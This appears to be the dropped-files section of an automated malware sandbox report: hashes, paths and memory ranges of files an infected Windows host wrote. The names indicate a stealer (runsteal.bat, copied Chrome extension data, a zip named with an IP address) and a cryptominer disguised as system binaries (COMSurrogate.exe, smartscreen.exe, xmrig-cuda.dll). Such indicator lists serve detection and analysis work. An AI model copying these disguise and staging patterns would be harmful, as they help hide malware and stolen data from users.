SHA512 c5a52af09c241eda4391518a585037423ac7db0a1388566440cefbbd7ebeaae2807679962944b19d85327a644255b4145b2d31ebc09527212c78d70b0908c0d1

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

MD5 b80037c0bd34c770845ec4580e997aab
SHA1 24e0ae64d348ec024e80bc94b6b651544f7e6b61
SHA256 dcaf52c0a4af65fbb7922043899a6c66e4a07ea21c972c316ae11ee3b023a990
SHA512 8854d8064e9f298ae0c9251ee5b14f81e22ac7f8bf22335979056e6f3c69651f1b0429d71e182817be3828fb98b2adb1d53e3d01838a205d61f52836accb4379

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

MD5 a50f83686a68f439075c62f1f3ab1138
SHA1 e09c4c29e1895b7c8382dd4beea0dd1c2eb731b9
SHA256 4a1aa1ab070cd0bdc225f13ffb7e9c746ba93ec81cfd10b8912cb30c5b1d16d5
SHA512 90930282d3bfa3d8e36b35e4895aa6892afd982ea0f734eeb3a5e34fa8eed08b651727dfdfa3a8c53e9bfee3ef26c00f74a687ab69dce4aac9c00ed12eb5a469

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/1548-1121-0x0000017FC4760000-0x0000017FC478E000-memory.dmp

memory/2628-1127-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 f515863dfc7aade03d3eb2d99a2c4501
SHA1 83703e745e1ed480e08cf053a1bbde7f87f33f02
SHA256 cbf8d419aeb512982f901994c40a1ea0ca7e13a282f8fbacae5c950a14bb2c23
SHA512 dff17827d1f50637b0b37cae31de5734ad91fc322bcdaec75f816442b2d2e535e45307d11ca50da101183b82ac9917d9cd8dd12fb8ae51898d6cb891c6d6b1ce

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 18908900c06122e66cab0b2dd95b1bbe
SHA1 af24a792815a9d15c4cb7e2bf1115bc978120902
SHA256 ae549d0bd0fdabaf4471d9fcd815b137ff0cc0ae105162ee5c864f577504dd1f
SHA512 1980235c8f4b66cb0fc911eb8b05316b511ab8a268bd91c4a1657697eff137d5e5e23a691c8251cfd8fa72abcfe592bc1c6de3e0e46fcdaf50a86c10505d6e39

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/216-1275-0x000000006EC10000-0x000000006EC5C000-memory.dmp

memory/216-1285-0x0000000006530000-0x00000000065D3000-memory.dmp

memory/216-1274-0x00000000064C0000-0x00000000064F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 36a8ab5fe4bb029eb0fc78d3a2cab6b5
SHA1 6c245318086156e640f3e08cca2fac17afa8e52c
SHA256 e911f268763b06510506752630cae301db85f5904300538adb40b12076199276
SHA512 a0438fee61643d9dc5478a2bdd2e5610242cc8fcb48f5fc825f74dd88ca22442c743282fb07bc85a07360ac6ec0162d4ae3c6c69534c6d841af8e6ea6c88f8a1

memory/216-1310-0x0000000007420000-0x0000000007431000-memory.dmp

memory/216-1355-0x0000000007460000-0x0000000007474000-memory.dmp

memory/2744-1366-0x000000006EC10000-0x000000006EC5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

MD5 da7552eed00789bd53f831e67cf54f8d
SHA1 653b2ec2b0975ab4b11f1c35a10e307c95450f17
SHA256 5cb4de27952514f557cf52a3a90b68f7c62a512732e799c766a85c4f7905f38f
SHA512 f618164b414a91ccb3569b85fad155fbb55defc55dfc5e2a48ee59f25307182ab2e3d9f8dddffc950cd6397442a876922608c0bbcc447ec0fc56f12446418bfc

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 76eef0061b2beda063c5a66489d4c03c
SHA1 c3ff2d8dba5c0ba788241d73ac70a92c8545dab0
SHA256 8a1c1188f87222ee2809c1974c29bf1db9b39e45c757e23356dd5df7f3e22498
SHA512 72ecf9ddc87ae231af8143db2e78c45b7bb94e9480345e72913953e951e3481d1906e00ea54d6daabe78d6f78ab74bf216b2e7abf500c4bd7468630ae8fe7481

memory/116-1587-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d36bf2c4eab0f5bddc135a170b8d496
SHA1 a7088d46f2e5438dccc39505b2ada2355704d204
SHA256 a37e77cb08a289c392f3dfadea9c7953fc2347c368be64b9cda37133767b3d64
SHA512 e0676c08ebc0cd97979c6dbd3786d11251f1f62d7c96cd4792e6879239f7ef9ecd70d6d62b2081e0cc15234eaec520153df68a930e5f2c6cfe25d1bc8b35b38d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

MD5 989f6b3eb20505afce1c56796c9eae2a
SHA1 21e88ffa0c459a666d98b54bc1fe663bceb9540f
SHA256 14da2bb8d62d6f45c4f4677afaeaada206639442aab418897d969335fcde0450
SHA512 9bc776890fe64e2450e4dd72f963b5a9485f48bb533ece7c497caface697682a97a4a2cf9bae264d4cd72e4f842c12131029387b832ed972829d6f8d596d1920

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2628-2089-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3f925a99f3d01da4891c46e54a5f019
SHA1 ceb83f8375c547c16db3d88b40074fddacdbadf2
SHA256 8c5ae5d3b15f675593ca5225c35c97a45185762f94c42466f6350c26ee17dfc5
SHA512 e2b9b4ac2030cc065ded93690db725e0abc922c68248aef121e9b8dd3189f9e04d82d9bf098a845598c38b7aeccb28d665f0b3c9cc65658a1d83ca1d509373f0

memory/1896-2136-0x0000026369200000-0x000002636922E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8d912e4d8f4291e86ae148983539474
SHA1 a54de8c3c200364d49151abbfeb80d1e6323d7b2
SHA256 b42df7b9c799e814bc3dba96ec7379428a3c9f5d5e9f27cd5fc08d945b6e2702
SHA512 baffd92146ccf3ceb736cb02d28751c2f6bfeeaff013210f7b6b12af7230314a6d9facc7d4b91f2ced0a3780be755fce7dfcd10a78c2446a8b7d02e37b005b4b

memory/6092-2629-0x0000000007370000-0x0000000007382000-memory.dmp

memory/6092-2632-0x0000000007390000-0x000000000739A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

MD5 f67672c18281ad476bb09676baee42c4
SHA1 fb4e31c9a39545d822b2f18b0b87ca465e7768c9
SHA256 d96b3d82465808c49ce3c948745074d143504d00f44a9ff3b26a42f0c88e1f61
SHA512 ff37752848af570cb284f5fb65837472ddf9941992fffceb049a70c36d858c37e4e87016176b4e62d0eda63c235ca742411947d50d163cbc7823c50a734f0898

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

MD5 0aeaac716a5e11ad3f56ddb6ccf40bcd
SHA1 d2293cf053c52c45e914eab50764f18b0fece809
SHA256 b1cea3985e29a9f8f8c9afe968104de65de901f8825db3ed3856c3d098fdf9fc
SHA512 6f37d1da5e32d28afaa3693e06852640ca41f369ca927e709d4e20422dca1599898427be3b65600af7686890c41969a83dace0bd75ccbbf0859cdf397ac814bc

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.old

MD5 b9d0515d6c1939a0cbf08b59c2e9b429
SHA1 00f3ff14830ff4e2457b596bf82bea105f3c0de0
SHA256 f68074654e867d82fb082a22b1281b0fd332998a5c66d205927d2f480008b657
SHA512 08dac65286753683d3dfd175a80d3815e7164f977b4cee29eab58ba45c216335a1fb3255fb60c424889d88b0997cd5012e2505a406785fa4a8011290c7678864

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip

MD5 5888863aae804fff17605eea9d4a635b
SHA1 c81e1883994f9e01432c38d3c27397e5eb5b9185
SHA256 ca3b06660f910103e5176015a657d6d845a5ee3fb60a065a5264080b1e80c85d
SHA512 19f6d8d6216651168d1ffde69ae126e4fe545e9753875b0d0c9b66ecb146ade374f43843c44283e5954b4c7e5db834a1bfdfcae34130472000f6bf84807626e5

memory/116-2787-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\asm\mi.exe

MD5 f6d520ae125f03056c4646c508218d16
SHA1 f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256 d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512 d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d

memory/2628-3477-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-3802-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/3528-3804-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-3810-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\asm\xmrig-cuda.dll

MD5 1b81191a719a51ad449746cc7c036243
SHA1 a22eac21ba0bd9b94e376c5c4b400e1bd99a64e0
SHA256 ac13ad51138cf50e982cab38f487ec8faad63c7014f5232873d141ef0f489ebf
SHA512 1b735facbe0e283ea4a7daa0c8cdc11a9f2ae52057656afd232f7b031f7229a46f9f2140c0b60aea2cbc3cbe78a93e604be6cca475b0780976d1ecb9deef5560